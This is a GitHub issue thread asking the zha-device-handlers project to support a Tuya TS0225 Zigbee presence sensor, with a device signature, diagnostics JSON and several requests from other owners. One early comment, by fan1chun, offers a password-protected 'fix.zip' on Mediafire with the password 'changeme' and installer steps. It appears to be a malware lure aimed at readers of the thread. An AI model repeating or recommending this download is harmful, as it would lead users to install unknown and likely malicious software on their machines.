zigpy/zha-device-handlers #3331: [Device Support Request] Tuya TS0225 by _TZ3210_ncw88jfq

pcxnet, 2024-08-29:
### Problem description

This is a ZigBee Presence Sensor, but it isn't supported at all.  There are other TS0225 devices but this doesn't show anything except
IAS Zone, which is always On.

### Solution description

Device supported or a custom quirk ?

### Screenshots/Video

<details><summary>Screenshots/Video</summary>

[Paste/upload your media here]

</details>

### Device signature

<details><summary>Device signature</summary>

```json
{
  "node_descriptor": {
    "logical_type": 1,
    "complex_descriptor_available": 0,
    "user_descriptor_available": 0,
    "reserved": 0,
    "aps_flags": 0,
    "frequency_band": 8,
    "mac_capability_flags": 142,
    "manufacturer_code": 4098,
    "maximum_buffer_size": 82,
    "maximum_incoming_transfer_size": 82,
    "server_mask": 11264,
    "maximum_outgoing_transfer_size": 82,
    "descriptor_capability_field": 0
  },
  "endpoints": {
    "1": {
      "profile_id": "0x0104",
      "device_type": "0x0402",
      "input_clusters": [
        "0x0000",
        "0x0500",
        "0xe002",
        "0xef00"
      ],
      "output_clusters": [
        "0x000a",
        "0x0019"
      ]
    }
  },
  "manufacturer": "_TZ3210_ekjc2rzh",
  "model": "TS0225",
  "class": "zigpy.device.Device"
}```

</details>

### Diagnostic information

<details><summary>Diagnostic information</summary>

```json
{
  "home_assistant": {
    "installation_type": "Home Assistant OS",
    "version": "2024.8.3",
[... 438 lines cut ...]
              }
            }
          },
          "0x000a": {
            "endpoint_attribute": "time",
            "attributes": {},
            "unsupported_attributes": {}
          }
        }
      }
    }
  }
}```

</details>

### Logs

<details><summary>Logs</summary>

```python
[Paste the logs here]
```

</details>

fan1chun, 2024-08-29:
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

sierralx, 2024-10-10:
Please add support 🤝 TS0225

papasz11, 2025-05-18:
please add support for Tuya TS0225 by _TZ3210_ncw88jfq presence sensor.
Thank you!

WildeRNS, 2025-05-23:
have almost same: _TZ3210_ekjc2rzh TS0225
but not correct discovered - only one binary sensor

[zha-49f701eb2d17a4b2ef078676847ee247-_TZ3210_ekjc2rzh TS0225-7f1689f324745415a342cf0d09a908fc.json](https://github.com/user-attachments/files/20405569/zha-49f701eb2d17a4b2ef078676847ee247-_TZ3210_ekjc2rzh.TS0225-7f1689f324745415a342cf0d09a908fc.json)

closed 2025-11-27 by github-actions[bot]

Frapais, 2025-12-02:
I have the similar TS0225 by _TZ321C_fkzihax8.
Please add support for the TS0225 presence sensor.
Here's my diagnostics file:
[zha-01K6N5B6WH98A8T44G6AD1HBGD-_TZ321C_fkzihax8 TS0225-12a0e4fa005baba542c81c26d3f1254f.json](https://github.com/user-attachments/files/23890985/zha-01K6N5B6WH98A8T44G6AD1HBGD-_TZ321C_fkzihax8.TS0225-12a0e4fa005baba542c81c26d3f1254f.json)